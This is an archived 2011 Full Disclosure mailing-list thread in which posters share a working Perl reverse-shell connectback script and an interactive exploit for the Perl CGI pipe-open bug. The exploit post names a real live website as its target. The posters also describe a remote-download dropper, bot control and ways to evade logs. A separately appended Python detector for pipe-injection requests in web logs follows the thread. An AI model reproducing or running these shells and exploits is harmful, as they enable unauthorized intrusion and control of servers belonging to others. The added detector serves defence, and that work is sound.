Full Disclosure mailing list archives
Re: perl pipe exploit (drops you at a shell)
From: xD 0x41 <secn3t () gmail com>
Date: Sun, 16 Oct 2011 14:30:58 +1100
Hehe.. fuck the other one.. it does not even give you the incoming IP, it has one line, and uses bin/sh -i, so it pretty much screws up the whole session from scratch :) Also, that one has been rumored to have static IP and port settings... although it is not so hard to make changes eh.. This one is basic, and you can even use a tiny 4 line .c file to actually drop and run the perl file ;p If you wish to make it more hidden, maybe from a REALLY fkn stupid admin, I would assume it would have to be, because most ppl do check system logs :P The few that don't though, that is already literally millions of attackable, pwnable, and very usable linux raw sockets :) That's as good as, sometimes, a baseball across the front of your server... depending how attackers use their systems, and every time someone puts up obvious logs that "i got ownedZ", they're promoting another ownage, and could probably NOT need with a detailed blog on exactly what was done etc, which is exactly what a good hax0r will do: just watch hidden for ages and keep the knowledge; when it is needed though, it is usually someone's log which has helped with, sometimes even rootkit links... which is really what's making it a big ass industry now.. Also the phpbot does not discriminate against OS... you find a good vuln or vector for windows, and phpbot will be all over it, sometimes it even looks like windows has better uptimes, but that could just be my own opinion, but we don't see the uptimes of linux as much.. I guess windows has a very short lifespan, I see people rm -rf after a week of abusing their sys with a million bad exes, just so they can watch you executing bot cmds ;p

It's a tricky thing, to rls things to public, or not to.. because it must be spoken about, but I wish people did not need to post their own ownage, just coz it is some 0day bug and they feel *special to be owned first*... Oh btw here..
#!/usr/bin/perl
use Socket;
$cmd= "Apache2";
$system = 'echo "`uname -a`";';
$system1= 'echo "`id`";';
$system2= 'echo "`pwd`";';
$system3= 'echo "`whoami`@`hostname`:~";';
$system4= '/bin/sh';
$0=$cmd;
$target=$ARGV[0];
$port=$ARGV[1];
$iaddr=inet_aton($target);
$paddr=sockaddr_in($port, $iaddr);
$proto=getprotobyname('tcp');
socket(SOCKET,PF_INET,SOCK_STREAM,$proto);
connect(SOCKET,$paddr);
open(STDIN,">&SOCKET");
open(STDOUT,">&SOCKET");
open(STDERR,">&SOCKET");
print "\n\n--CbacK--\n\n";
print "\nSysInfo: ";
system($system);
print "\nCurrent ID: ";
system($system1);
print "\nCurrent Dir: ";
system($system2);
print "\n";
system($system3);
system($system4);
close(STDIN);
close(STDOUT);
close(STDERR);

....will print exactly what you need information wise, and nothing more.. execl() would be easier to do, I just did not want to show how to, exactly, on this list... and I think this connectback is about as old as my fkn house, so, cpl hundred yrs or so :P Just be sure to know it is simple to execute this, perl cb.pl ip-here port-here, SOoooo eg:

[xd@b0x]:~ # perl cb.pl 172.16.1.12 4444

will connect me to a local LAN box. I removed all non-necessary IRC and other rubbish outputs, so the shell is optimised for simple speed, and yea, modify them system() cmds ;) they're kinda there to keep it a bit safer :P This has been used by kcope and many others as the simple basis for MOST GOOD shells which will do what you want, without you having to always ask... and I see the Iranian one does exec bin/sh -i, thus killing job control :s how stupid and unnecessary, and one extra logging! I would not hand out howtos on using it, but it is very simple if you know what you are doing.
Later, and oh, I added chmod 500 $1, so a basic chmod for your pipe() script, but atm it is using the box's chmod; I will code in a 'cmod' which does the same, with a different order/cmd use, and it does not copy over bin/chmod ofc... which is why I think it best to always just add in your own chmod, but I guess everything which handles files on unix should handle chmod also so you can use them :P hehe.. so I just added a basic auto-chmod for the program binary first, then any binary used with just the "chmod" cmd in the shell... very simple and sooo handy! That's about all it really needed, now I'll connect them up and exchange a few things for much nicer dev/null logging, etc etc etc :>

Who said FD is dead... we were just *resting* our usually quite high IQ minds, which factually take more time than the average NON high-IQ homo sapien ... kekeke... yes, call me mad but who cares... I don't hide it, crazycoders.com was not just a *name* sheesh..

Cheers, and I guess used in combination, this could be a very handy connectback which does not show logging because the method is just not visible.. although you must use that little bash trick '>&', the best *feature* in bash :) Still makes connectback so darn easy! I think u have given a lot for ppl who cannot operate wget etc, well you know what I mean ;) Many ppl would like this, and appreciate it.. I do! cheers Marshall, you would be asked a lot if you like Eminem I bet... or not... anyhow, Do you like EMINEM?? take care! hehe, always keep your spirits high and life even higher, live it like it's the last day, every day! peace and great job!

xd // admin @ Crazycoders.com // ( nick xd-- ) #Haxnet @ Efnet for simple communication // NON racist/Polly

On 16 October 2011 12:38, Marshall Whittaker <marshallwhittaker () gmail com> wrote:
Yeah, I intentionally wrote it to avoid a connect back or bindshell because a lot of firewalls block those (I've been tooling around with firewall evasion techniques lately...). I have some code laying around somewhere that does some kind of connect back from perl I think. I'd have to find it though. If you want it let me know. I think some Iranians wrote it lol. Anyway, thanks for the comments on the code. :)

On Sat, Oct 15, 2011 at 9:44 PM, xD 0x41 <secn3t () gmail com> wrote:

Thanks for the POST! That's VERY cool, although it was done before, and I did not match codes to see any differences/changes/updates, because I am aware that many systems are being fixed against this bug as I know, or rather, perl stdinout is maybe being patched in some versions, although it does seem to work stable on Debian lenny and that's ok, that would mean most likely Ubuntu is also vulnerable... Personally, I have code which is about half the size of both the ones I have seen, but they do a download to the box, so it is a personal wget.pl which gets, makes the dir if none exists, cds to the dir, and the cmd is simply like this:

./file.pl pipeget www.blah.com/mybot.txt /var/.inaddr/arpa.ps

This would then save the file, and chmod it automatically as chmod filename +x, which is just a command I thought was critical when this type of stuff is used... So, I might try and personalise this, and see if it works better. I know the first method I was using to get was nothing like the one I have now, which is pipe() also, but it just totally makes the need for using wget not needed, and then also the file and whole session of ./file.pl gets saved to bash_history as a . on its own line, which is including if you upload/get files from one box and up to the local one you're sitting on.
Your version looks the most adaptive one, and would be great to have enabled on any connectback shell; maybe the chmod cmd could be automatic when it puts a file upload/download, however you access it. I know the main way a user on a control net would simply privmsg it, and use that pipe exploiting to upload everything, chmod, and hide everything, which is probably the BEST addon I could think of for any rootkit, and even just an upload command, if you target index.php, and look for pg=/page=, maybe a simple my @array("'?page=', '?pagina=', '?pg=', '?Page=', '?url=', "); for it to target things, and make it show simple CMDS> output on connect-back, then print a quick sysinfo and make sure to show things right on the connectback, then have this, and direct a while($perl_pipe_uploader2) {}, maybe adding in if/else using the first perlpipeupload.pl as the first method.. this could be great! I will look for my code which is more like a wget but uses the exact same bugs; it actually works better than the standard get/wget or fetch, as there are no switches needed, just the correct args, and it does the rest in execl() mode. Thru this, I have, I think, in the old days probably used this bug so much that it became a feature for a while :P I think the scripting is great, the code is good, clear and concise, and very easy to simply use as an addon case 'perlpipeupload2': or however you may add it.. it is awesome code. I might have to snippet this posting and show both, or all 3, on my website (crazycoders.com), and if you have a posting already up which will stay there, I'd be happy to point to it, and also paste it, so thanks! I will try and find the code for the wget/put/uploader; when you're in PM with a bot and you do !cmd mywget a.at/bot /b/o/t, the only switches are -s|-n for silent or notice the user exact infos, pretty much a wget-summary. I like the code and appreciate your posting. It is a nice bug and an even nicer method to exploit it.
regards, xd-- // #haxnet@EFnet // Independent Arsehole

PS: shizzle my nizzle matey! shizzle it good!

On 16 October 2011 09:01, Marshall Whittaker <marshallwhittaker () gmail com> wrote:

Well shit. It did send twice. :( Now I look like a goof, haha.

On Sat, Oct 15, 2011 at 6:58 PM, Marshall Whittaker <marshallwhittaker () gmail com> wrote:

This works off the perl pipe read bug, you can just input the first and second parts of the web address (with http:// included) and it'll drop you at a shell. When using cd you must use the absolute path because I was too lazy to do it the correct way. ;-). I know this is pretty easy stuff, it works off those vulns that can just be exploited with a web browser, but this gives you a shell. So have at it guys & gals! Had to resend because I got some message about my attachment being blocked. Not sure if it really was, though, I'll send again anyway. Hope this isn't spamming the list. =/

Site: http://ultimategto.com/cgi-bin/statsedittext.cgi?filename=stats/1966vinmatrix.htm&desc=Stat+File

Usage: ./sublime.pl "http://ultimategto.com/cgi-bin/statsedittext.cgi?filename=" "&desc=Stat+File"

Should work on most perl cgi scripts that are vulnerable to the | read bug. Please note, it's not a "real" shell, but almost everything works, except things that won't go in one instance like cd-ing and env vars, etc. Play nice!

--oxagast

[CODE]
#!/usr/bin/perl
# adaptive cgi shell by oxagast
use LWP::Simple;
$part1 = @ARGV[0];
$part2 = @ARGV[1];
print "Making buffer...\n";
for $bet (100..200) {
  $bettwo = $bettwo . "AAAA" . $bet . "AAAA\\\\n";
}
print "Exploiting...\n";
$id = get("$part1\|id\|$part2");
$id =~ m/(uid=\d+\(.*\) gid=\d+\(.*\) groups=\d+\(.*\))/;
print "Well shizzle my nizzle... shell by oxagast... use wisely \;\)\n\n";
$uid = $1;
print "$uid\n";
while (0 == 0) {
  print "\$ ";
  $cmd = <STDIN>;
  chomp($cmd);
  if ($cmd =~ m/cd (\/.*)/) { $dir = $1; }
  if ($cmd eq "cd ..") { $dir =~ s/(.*)\/.*/\/\1/; }
  if ($cmd eq "pwd") {
    $dirjunk = $dir;
    if ($dirjunk eq "//") { $dirjunk = "/"; }
  }
  $dirjunk = "cd $dir\;$cmd";
  $cmdhex = unpack("H*","$dirjunk &>/tmp/cmdlnerr");
  $cmdhex =~ s/(..)/\\\\x$1/g;
  get("$part1\|echo -e $bettwo > /tmp/buff\|$part2");
  $backjunk2 = get("$part1\|cat /tmp/buff\|$part2");
  @backjunk = split("\n", $backjunk2);
  get("$part1\|echo -e \"$cmdhex\" > /tmp/cmdln\|$part2");
  get("$part1\|/bin/sh /tmp/cmdln > /tmp/cmdlerr\|$part2");
  $backjunk_as = get("$part1\|cat /tmp/cmdlnerr\|$part2");
  @backjunk_split = split("\n", $backjunk_as);
  $backjunk_wcl = get("$part1\|wc -l /tmp/cmdlnerr\|$part2");
  $backjunk_wcl =~ m/(\d+) \/tmp\/cmdlnerr/m;
  $thismanylines = $1 - 1;
  for $junknum (0..scalar(@backjunk_split)) {
    for $fuzz (10..100+$thismanylines) {
      if ($backjunk[$junknum] =~ m/(AAAA\Q$fuzz\EAAAA)/) {
        $middle = $1;
        @backjunk[$junknum] =~ m/(.*)\Q$middle\E/;
        @backjunk_split[$junknum] =~ s/$1//;
        @backjunk[$junknum] =~ m/\Q$middle\E(.*)/;
        @backjunk_split[$junknum] =~ s/$1//;
        print "$backjunk_split[$junknum]\n";
      }
    }
  }
}
[/CODE]

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
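From the defender's side, an added example that is not code from the thread: a small Python detector over NCSA-style access log lines that flags requests to .cgi/.pl scripts whose decoded query parameter value starts or ends with a pipe, the shape that Perl's two-argument open() turns into a command pipe. It also catches the URL-encoded form (%7C); the log lines, the log format and the cutoff to CGI paths are assumptions, and all sample lines are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Assumed NCSA/Apache-style line: client, ident, user, [timestamp], "request", status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)

# Only paths that plausibly run Perl CGI get the pipe check (assumption).
CGI_PATH_RE = re.compile(r'\.(?:cgi|pl)$', re.IGNORECASE)


def pipe_open_suspect(value: str) -> bool:
    """True when a decoded parameter value has the 2-arg open() pipe shape:
    a leading '|' opens a pipe *to* a command, a trailing '|' reads *from* one."""
    v = value.strip()
    return v.startswith("|") or v.endswith("|")


def scan_line(line: str):
    """Return a finding dict for a suspicious CGI request, or None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    url = urlsplit(m.group("target"))
    if not CGI_PATH_RE.search(url.path):
        return None
    # parse_qsl percent-decodes values, so %7C and a literal '|' are treated alike.
    for name, value in parse_qsl(url.query, keep_blank_values=True):
        if pipe_open_suspect(value):
            return {"ip": m.group("ip"), "ts": m.group("ts"), "path": url.path,
                    "param": name, "value": value}
    return None


def scan(lines):
    """Scan many lines; keep only the findings."""
    return [f for f in (scan_line(l) for l in lines) if f]


# Constructed sample lines (not taken from the thread). The second mimics the
# injection shape discussed above with the pipes URL-encoded; the third has a
# pipe in the middle of a non-CGI parameter and must not be flagged.
SAMPLE_LOG = [
    '203.0.113.5 - - [15/Oct/2011:18:58:01 -0400] "GET /cgi-bin/statsedittext.cgi?filename=stats/1966vinmatrix.htm&desc=Stat+File HTTP/1.1" 200 1532',
    '203.0.113.5 - - [15/Oct/2011:18:58:07 -0400] "GET /cgi-bin/statsedittext.cgi?filename=%7Cid%7C&desc=Stat+File HTTP/1.1" 200 88',
    '198.51.100.9 - - [15/Oct/2011:18:59:13 -0400] "GET /index.php?page=a%7Cb HTTP/1.1" 200 512',
]

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"{f['ts']} {f['ip']} {f['path']} param={f['param']!r} value={f['value']!r}")
```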
Current thread:
- perl pipe exploit (drops you at a shell) Marshall Whittaker (Oct 15)
- Re: perl pipe exploit (drops you at a shell) Marshall Whittaker (Oct 15)
- Re: perl pipe exploit (drops you at a shell) xD 0x41 (Oct 15)
- Message not available
- Re: perl pipe exploit (drops you at a shell) xD 0x41 (Oct 15)
- Message not available
- Re: perl pipe exploit (drops you at a shell) xD 0x41 (Oct 15)
- Re: perl pipe exploit (drops you at a shell) xD 0x41 (Oct 15)
- Message not available
- Re: perl pipe exploit (drops you at a shell) xD 0x41 (Oct 15)
- Message not available
- Re: perl pipe exploit (drops you at a shell) xD 0x41 (Oct 16)
- Message not available
- Re: perl pipe exploit (drops you at a shell) Valdis . Kletnieks (Oct 16)
- Re: perl pipe exploit (drops you at a shell) Marshall Whittaker (Oct 15)